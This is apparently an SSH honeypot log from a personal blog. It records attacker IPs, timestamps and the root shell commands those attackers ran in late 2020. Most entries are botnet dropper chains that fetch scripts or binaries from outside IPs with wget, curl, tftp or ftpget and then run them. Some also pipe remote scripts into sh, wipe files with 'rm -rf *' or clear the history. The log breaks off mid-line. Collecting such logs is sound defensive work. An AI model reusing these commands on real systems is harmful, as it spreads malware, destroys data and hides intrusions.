Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.49.240.16/sensi.sh; curl -O http://185.49.240.16/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 185.49.240.16 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 185.49.240.16; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.49.240.16 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * ; wget 35.203.175.171/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.203.175.171/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.49.240.16/sensi.sh
curl -O http://185.49.240.16/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 185.49.240.16 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 185.49.240.16
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.49.240.16 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
wget 35.203.175.171/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 35.203.175.171/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 157.230.80.53 29-Oct-2020 06:32:08 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cat /etc/issue
cat /etc/issue

From 222.186.46.13 29-Oct-2020 12:27:03 ssh2 root
Exec echo 1
echo 1

From 34.80.219.76 30-Oct-2020 06:33:55 ssh2 root
Exec cat /etc/issue ; wget 120.48.8.77/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 120.48.8.77/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 120.48.8.77/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 120.48.8.77/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 45.153.203.172 31-Oct-2020 21:54:53 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.172/update.sh; curl -O http://45.153.203.172/update.sh; chmod 777 update.sh; sh update.sh; tftp 45.153.203.172 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 45.153.203.172; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.153.203.172/update.sh
curl -O http://45.153.203.172/update.sh
chmod 777 update.sh
sh update.sh
tftp 45.153.203.172 -c get update.sh
chmod 777 update.sh
sh update.sh
tftp -r update2.sh -g 45.153.203.172
chmod 777 update2.sh
sh update2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 update1.sh update1.sh
sh update1.sh
rm -rf update.sh update.sh update2.sh update1.sh
rm -rf *

From 37.46.150.243 1-Nov-2020 12:10:49 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.243/hentai.sh; curl -O http://37.46.150.243/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.243/hentai.sh
curl -O http://37.46.150.243/hentai.sh
chmod 777 hentai.sh
sh hentai.sh
rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh
rm -rf *

From 185.212.149.160 1-Nov-2020 12:36:44 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://107.175.94.18/Pumpkin.sh; chmod 777 Pumpkin.sh; sh Pumpkin.sh; tftp 107.175.94.18 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.94.18; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://107.175.94.18/Pumpkin.sh
chmod 777 Pumpkin.sh
sh Pumpkin.sh
tftp 107.175.94.18 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.175.94.18
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 159.65.115.115 2-Nov-2020 17:55:41 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.195.213/Thorbins.sh
chmod 777 Thorbins.sh
sh Thorbins.sh
tftp 104.168.195.213 -c get Thortftp1.sh
chmod 777 Thortftp1.sh
sh Thortftp1.sh
tftp -r Thortftp2.sh -g 104.168.195.213
chmod 777 Thortftp2.sh
sh Thortftp2.sh
rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh
rm -rf *
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 45.145.185.25 2-Nov-2020 19:19:56 ssh2 root
Exec wget http://45.145.185.25/we.sh; curl -O http://45.145.185.25/we.sh; chmod 777 we.sh; sh we.sh
wget http://45.145.185.25/we.sh
curl -O http://45.145.185.25/we.sh
chmod 777 we.sh
sh we.sh

From 167.71.177.87 3-Nov-2020 01:18:02 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://107.173.91.164/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 107.173.91.164 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 107.173.91.164; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://107.173.91.164/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 107.173.91.164 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 107.173.91.164
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 213.142.137.25 4-Nov-2020 06:05:38 ssh2 root
Exec uname -a; cd /tmp; wget 185.82.200.52/n3;perl n3;rm -rf n3*
uname -a
cd /tmp
wget 185.82.200.52/n3
perl n3
rm -rf n3*

From 36.133.122.36 4-Nov-2020 19:13:31 ssh2 root
Exec wget http://45.145.185.25/wash.sh; curl -O http://45.145.185.25/wash.sh; chmod 777 wash.sh; sh wash.sh
wget http://45.145.185.25/wash.sh
curl -O http://45.145.185.25/wash.sh
chmod 777 wash.sh
sh wash.sh

From 45.126.132.175 6-Nov-2020 01:41:36 ssh2 root
Exec uname -a; cd /tmp; wget http://185.82.200.52/n3; perl n3; rm -rf n3
uname -a
cd /tmp
wget http://185.82.200.52/n3
perl n3
rm -rf n3

From 64.227.11.94 6-Nov-2020 09:45:40 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.136.157/Mercury.sh; curl -O http://107.175.136.157/Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp 107.175.136.157 -c get Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp -r Mercury2.sh -g 107.175.136.157; chmod 777 Mercury2.sh; sh Mercury2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.136.157 Mercury1.sh Mercury1.sh; sh Mercury1.sh; rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh; rm -rf *																			ROOT Payload:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.136.157/bins/Mercury.x86 -O /tmp/Mercury; chmod +x /tmp/Mercury; /tmp/Mercury Mercury.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.136.157/Mercury.sh
curl -O http://107.175.136.157/Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp 107.175.136.157 -c get Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp -r Mercury2.sh -g 107.175.136.157
chmod 777 Mercury2.sh
sh Mercury2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.175.136.157 Mercury1.sh Mercury1.sh
sh Mercury1.sh
rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh
rm -rf * ROOT Payload:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.136.157/bins/Mercury.x86 -O /tmp/Mercury
chmod +x /tmp/Mercury
/tmp/Mercury Mercury.x86

From 157.245.135.79 7-Nov-2020 21:41:53 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://185.243.215.254/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 185.243.215.254 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 185.243.215.254; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://185.243.215.254/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 185.243.215.254 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 185.243.215.254
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 159.203.188.156 8-Nov-2020 02:59:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.95.215.12/Mercury.sh; curl -O http://23.95.215.12/Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp 23.95.215.12 -c get Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp -r Mercury2.sh -g 23.95.215.12; chmod 777 Mercury2.sh; sh Mercury2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 Mercury1.sh Mercury1.sh; sh Mercury1.sh; rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.95.215.12/Mercury.sh
curl -O http://23.95.215.12/Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp 23.95.215.12 -c get Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp -r Mercury2.sh -g 23.95.215.12
chmod 777 Mercury2.sh
sh Mercury2.sh
ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 Mercury1.sh Mercury1.sh
sh Mercury1.sh
rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh
rm -rf *

From 171.110.230.134 8-Nov-2020 05:18:51 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://bpsuck.hldns.ru/wget.sh || curl http://bpsuck.hldns.ru/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://bpsuck.hldns.ru/wget.sh || curl http://bpsuck.hldns.ru/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 159.203.188.156 9-Nov-2020 03:17:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.95.215.12/8UsA.sh; curl -O http://23.95.215.12/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 23.95.215.12 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 23.95.215.12; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.95.215.12/8UsA.sh
curl -O http://23.95.215.12/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 23.95.215.12 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 23.95.215.12
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 45.153.203.17 9-Nov-2020 08:21:23 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.17/bins/Mercury.x86 -O /tmp/Mercury; chmod +x /tmp/Mercury; /tmp/Mercury Mercury.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.153.203.17/bins/Mercury.x86 -O /tmp/Mercury
chmod +x /tmp/Mercury
/tmp/Mercury Mercury.x86

From 165.227.141.136 9-Nov-2020 08:33:12 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.195.213/Thorbins.sh
chmod 777 Thorbins.sh
sh Thorbins.sh
tftp 104.168.195.213 -c get Thortftp1.sh
chmod 777 Thortftp1.sh
sh Thortftp1.sh
tftp -r Thortftp2.sh -g 104.168.195.213
chmod 777 Thortftp2.sh
sh Thortftp2.sh
rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh
rm -rf *

From 51.159.166.212 9-Nov-2020 23:48:24 ssh2 root
Exec wget http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) -O- | sh; curl http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) | sh
wget http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) -O- | sh
curl http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) | sh

From 46.249.32.70 10-Nov-2020 07:18:15 ssh2 root
Exec wget http://185.172.111.199:10293/bot.x86_64 -O- > /tmp/.f; chmod 777 /tmp/.f; /tmp/.f
wget http://185.172.111.199:10293/bot.x86_64 -O- > /tmp/.f
chmod 777 /tmp/.f
/tmp/.f

From 212.129.29.208 10-Nov-2020 10:04:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://178.159.36.245/update.sh; curl -O http://178.159.36.245/update.sh; chmod 777 update.sh; sh update.sh; tftp 178.159.36.245 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 178.159.36.245; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 178.159.36.245 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://178.159.36.245/update.sh
curl -O http://178.159.36.245/update.sh
chmod 777 update.sh
sh update.sh
tftp 178.159.36.245 -c get update.sh
chmod 777 update.sh
sh update.sh
tftp -r update2.sh -g 178.159.36.245
chmod 777 update2.sh
sh update2.sh
ftpget -v -u anonymous -p anonymous -P 21 178.159.36.245 update1.sh update1.sh
sh update1.sh
rm -rf update.sh update.sh update2.sh update1.sh
rm -rf *

From 67.207.90.208 11-Nov-2020 06:08:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.249.32.194/ByeBye.sh; curl -O http://46.249.32.194/ByeBye.sh; chmod 777 ByeBye.sh; sh ByeBye.sh; tftp 46.249.32.194 -c get ByeBye.sh; chmod 777 ByeBye.sh; sh ByeBye.sh; tftp -r ByeBye2.sh -g 46.249.32.194; chmod 777 ByeBye2.sh; sh ByeBye2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.249.32.194 ByeBye1.sh ByeBye1.sh; sh ByeBye1.sh; rm -rf ByeBye.sh ByeBye.sh ByeBye2.sh ByeBye1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.249.32.194/ByeBye.sh
curl -O http://46.249.32.194/ByeBye.sh
chmod 777 ByeBye.sh
sh ByeBye.sh
tftp 46.249.32.194 -c get ByeBye.sh
chmod 777 ByeBye.sh
sh ByeBye.sh
tftp -r ByeBye2.sh -g 46.249.32.194
chmod 777 ByeBye2.sh
sh ByeBye2.sh
ftpget -v -u anonymous -p anonymous -P 21 46.249.32.194 ByeBye1.sh ByeBye1.sh
sh ByeBye1.sh
rm -rf ByeBye.sh ByeBye.sh ByeBye2.sh ByeBye1.sh
rm -rf *

From 195.58.39.223 12-Nov-2020 08:40:09 ssh2 root
Exec wget http://104.168.195.213/Cipher.sh; chmod 777 *; sh Cipher.sh
wget http://104.168.195.213/Cipher.sh
chmod 777 *
sh Cipher.sh

From 195.58.39.249 12-Nov-2020 14:42:23 ssh2 root
Exec wget http://45.153.203.129/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Roots; rm -rf Astra.* ; history -c
wget http://45.153.203.129/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 Roots
rm -rf Astra.*
history -c

From 88.218.16.43 13-Nov-2020 23:25:35 ssh2 root
Exec wget http://88.218.16.144/we.sh; curl -O http://88.218.16.144/we.sh; chmod 777 we.sh; sh we.sh
wget http://88.218.16.144/we.sh
curl -O http://88.218.16.144/we.sh
chmod 777 we.sh
sh we.sh

From 167.172.131.7 14-Nov-2020 01:11:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://165.227.161.94/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 165.227.161.94 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c*
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://165.227.161.94/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 165.227.161.94 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c*

From 134.209.76.96 14-Nov-2020 19:09:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.249.32.194/bins/ByeBye.x86 -O /tmp/ByeBye; chmod +x /tmp/ByeBye; /tmp/ByeBye ByeBye.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.249.32.194/bins/ByeBye.x86 -O /tmp/ByeBye
chmod +x /tmp/ByeBye
/tmp/ByeBye ByeBye.x86

From 34.125.21.82 14-Nov-2020 21:31:53 ssh2 root
Exec nc 1 1; cd /tmp; cat /etc/issue;
nc 1 1
cd /tmp
cat /etc/issue

From 206.81.6.138 15-Nov-2020 19:04:22 ssh2 root
Exec wget http://92.42.45.227/bin.sh; chmod +x bin.sh; sh bin.sh
wget http://92.42.45.227/bin.sh
chmod +x bin.sh
sh bin.sh

From 206.81.29.232 16-Nov-2020 23:17:13 ssh2 root
Exec wget http://198.23.209.128/bin.sh; chmod +x bin.sh; sh bin.sh
wget http://198.23.209.128/bin.sh
chmod +x bin.sh
sh bin.sh
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 142.93.169.123 17-Nov-2020 07:04:00 ssh2 root
Exec wget http://198.23.209.128/bin.sh; chmod +x bin.sh; sh bin.sh
wget http://198.23.209.128/bin.sh
chmod +x bin.sh
sh bin.sh

From 167.172.38.93 17-Nov-2020 16:33:18 ssh2 root
Exec wget http://45.153.203.129/bins/Astra.x32; chmod 777 Astra.x32; ./Astra.x32 Roots.x32; rm -rf Astra.* ; history -c
wget http://45.153.203.129/bins/Astra.x32
chmod 777 Astra.x32
./Astra.x32 Roots.x32
rm -rf Astra.*
history -c

From 90.255.231.176 18-Nov-2020 19:55:05 ssh2 root
ls
ll
exit

From 165.232.45.141 19-Nov-2020 21:27:48 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 165.232.45.141 19-Nov-2020 21:41:21 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 68.183.72.81 21-Nov-2020 10:53:40 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.209.128/Beastmode.sh; curl -O http://198.23.209.128/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 198.23.209.128 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 198.23.209.128; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.23.209.128 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.209.128/Beastmode.sh
curl -O http://198.23.209.128/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 198.23.209.128 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 198.23.209.128
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.23.209.128 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 161.97.64.180 21-Nov-2020 19:07:59 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -s -v -n -r
uname -s -v -n -r

From 2.57.122.15 22-Nov-2020 00:11:32 ssh2 root
Exec grep 'cpu cores' /proc/cpuinfo | uniq
grep 'cpu cores' /proc/cpuinfo | uniq

From 167.71.64.214 22-Nov-2020 06:28:36 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.20/bins.sh; curl -O http://37.46.150.20/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.20/bins.sh
curl -O http://37.46.150.20/bins.sh
chmod 777 bins.sh
sh bins.sh
rm -rf *

From 218.76.215.4 22-Nov-2020 07:16:32 ssh2 root
Exec ping 8.8.8.8
ping 8.8.8.8
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 161.97.64.180 22-Nov-2020 09:39:04 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 171.223.110.188 22-Nov-2020 18:46:24 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.41.29/wget.sh || curl http://46.246.41.29/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://46.246.41.29/wget.sh || curl http://46.246.41.29/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 167.99.254.185 23-Nov-2020 06:36:55 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.77/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.77 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.77; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.77/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 45.14.224.77 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 45.14.224.77
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 8.9.15.68 24-Nov-2020 21:48:27 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://5.189.188.163/slumpbins.sh; chmod 777 slumpbins.sh; sh slumpbins.sh; tftp 5.189.188.163 -c get slumptftp1.sh; chmod 777 slumptftp1.sh; sh slumptftp1.sh; tftp -r slumptftp2.sh -g 5.189.188.163; chmod 777 slumptftp2.sh; sh slumptftp2.sh; rm -rf slumpbins.sh slumptftp1.sh slumptftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://5.189.188.163/slumpbins.sh
chmod 777 slumpbins.sh
sh slumpbins.sh
tftp 5.1

Emil's Projects & Reviews

OpenHardware & OpenSource